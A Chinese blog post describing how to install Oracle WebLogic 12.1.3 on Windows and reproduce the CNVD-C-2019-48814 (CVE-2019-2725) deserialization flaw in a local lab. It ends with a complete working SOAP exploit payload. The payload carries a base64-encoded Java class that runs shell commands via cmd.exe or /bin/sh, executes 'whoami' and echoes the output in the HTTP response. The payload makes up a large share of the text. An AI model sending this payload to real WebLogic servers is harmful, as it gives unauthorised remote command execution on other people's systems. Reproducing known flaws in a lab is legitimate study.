从windows安装weblogic到复现CNVD-C-2019-48814

原创

小毒物 2019-05-05 15:37:26 博主文章分类：安全历程 ©著作权

文章标签 windows安装weblogic CNVD-C-2019-48814 cve-2019-2725 文章分类 网络安全

©著作权归作者所有：来自51CTO博客作者小毒物的原创作品，请联系作者获取转载授权，否则将追究法律责任

以前总是不喜欢自己搭环境验证漏洞，后面觉得总不好，大概少了可依赖的人，还是要自己慢慢一点点的学习。

1、验证环境

服务器：win server 2008 R2 64位 jdk版本：1.8.0_65 weblogic版本：12.1.3

2、安装weblogic

首先登陆oracle账号，下载weblogic，地址如下： https://www.oracle.com/technetwork/cn/middleware/ias/downloads/wls-main-091116-zhs.html 我下载的是fmw_12.1.3.0.0_wls.jar，本来想下载10.6.3，找不到64位的，就下载了12.1.3的通用，看有资料说weblogic不分64位和32位，通用的就行。因为下载的是jar文件，以管理员身份运行cmd，输入java –jar 目录+jar进行安装，这里遇到一个问题，运行结果显示“失效的JdK”，后经查阅资料解决办法如下：检查java是否安装成功，发现输入java没问题，输入javac有问题，重新加环境变量，然后javac没问题，发现还是出现jdk失效的问题，最后将fmw_12.1.3.0.0_wls.jar文件复制到%JAVA_HOME%\bin目录下，然后执行成功，如图：出现图形界面后就选择下一步直到安装完成。如图：然后开始配置weblogic，如图：勾选全部项，下一步配置用户名密码然后均不需要更改，一直下一步，最后点击创建。找到图中目录，运行cmd文件，启动weblogic服务运行成功浏览器访问： http://localhost:7001/console/login/LoginForm.jsp 出现如下错误，继续刷新，或者换个浏览器就行。 “Deploying application for /console/login/LoginForm.jsp...” 利用之前设置的用户名密码登陆之后如图：默认用户名密码是weblogic/weblogic123 如此weblogic算是在windows部署好了，现在开始进行cnvd-c-2019-48814漏洞的复现。

3、漏洞复现

访问：/_async/AsyncResponseService，存在以下页面，就有可能存在漏洞。最开始用的ie，发现ie抓不到127.0.0.1:7001的数据包，换成谷歌就可以了。然后利用网上的poc进行测试，但是不如人意，出现如下错误查看报错信息，Null content type，发现数据包头部没有content-type参数，然后加上就能执行命令弹出计算器了。再次看了一下，最开始是抓包直接把get改成post，所以没有content-type参数。然后再次抓包利用burp右键更改method如图，数据包会自动添加两个字段，但是依然报错，content-type错误，所以得记得手动把content-type改成text/xml格式

在写文章时看到一位博主的签名，觉得很有道理，动手一遍总会有收获。 “眼观千遍 → 耳听万遍 → 不如手动一遍√”

后续在github上找了很多poc，几乎都不能利用成功，今天尝试了一个可以，不过好像是利用wls-wsat组件执行命令的，所以可能依然使用的是cve-2017-10271的poc。如图：代码如下：（不保证代码安全问题） <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> soapenv:Header wsa:Actionxx</wsa:Action>wsa:RelatesToxx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <class><string>org.slf4j.ext.EventData</string> <void> <string> <java> <void class="sun.misc.BASE64Decoder"> <void method="decodeBuffer" id="byte_arr"> <string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string> </void> </void> <void class="org.mozilla.classfile.DefiningClassLoader"> <void method="defineClass"> <string>ResultBaseExec</string> <object idref="byte_arr"></object> <void method="newInstance"> <void method="do_exec" id="result"> <string>whoami</string> </void> </void> </void> </void>

		<void class="java.lang.Thread" method="currentThread">
			<void method="getCurrentWork" id="current_work">
				<void method="getClass">
					<void method="getDeclaredField">
						<string>connectionHandler</string>
							<void method="setAccessible"><boolean>true</boolean></void>
						<void method="get">
							<object idref="current_work"></object>
							<void method="getServletRequest">
								<void method="getResponse">
									<void method="getServletOutputStream">
										<void method="writeStream">
											<object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object>
											</void>
										<void method="flush"/>
										</void>
								<void method="getWriter"><void method="write"><string></string></void></void>
								</void>
							</void>
						</void>
					</void>
				</void>
			</void>
		</void>
	</java>

</string> </void> </class> </java> </work:WorkContext> </soapenv:Header> soapenv:Body asy:onAsyncDelivery/</soapenv:Body></soapenv:Envelope>